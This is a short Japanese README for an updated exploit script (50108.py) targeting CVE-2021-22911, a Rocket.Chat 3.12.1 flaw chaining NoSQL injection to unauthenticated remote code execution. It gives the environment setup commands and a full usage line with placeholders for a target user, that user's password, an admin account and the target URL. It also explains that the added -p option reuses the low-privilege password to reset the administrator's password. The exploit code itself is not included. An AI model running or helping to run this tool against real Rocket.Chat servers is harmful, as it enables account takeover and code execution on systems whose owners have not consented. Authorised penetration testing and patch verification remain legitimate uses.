
CVE-2021-22911(Rocket.Chat 3.12.1 - NoSQLインジェクションからRCEへ(未認証))用の更新版エクスプロイト
$ python -m venv venv
$ source venv/bin/activate
$ pip install requests oathtool
-p を追加しました。これは低権限ユーザーのパスワードを受け取り、管理者パスワードのリセットにも同じものを使います。$ python 50108.py -u "[email protected]" -p "<low priv user password>" -a "admin@localhost" -t "http://<ip>:<port>"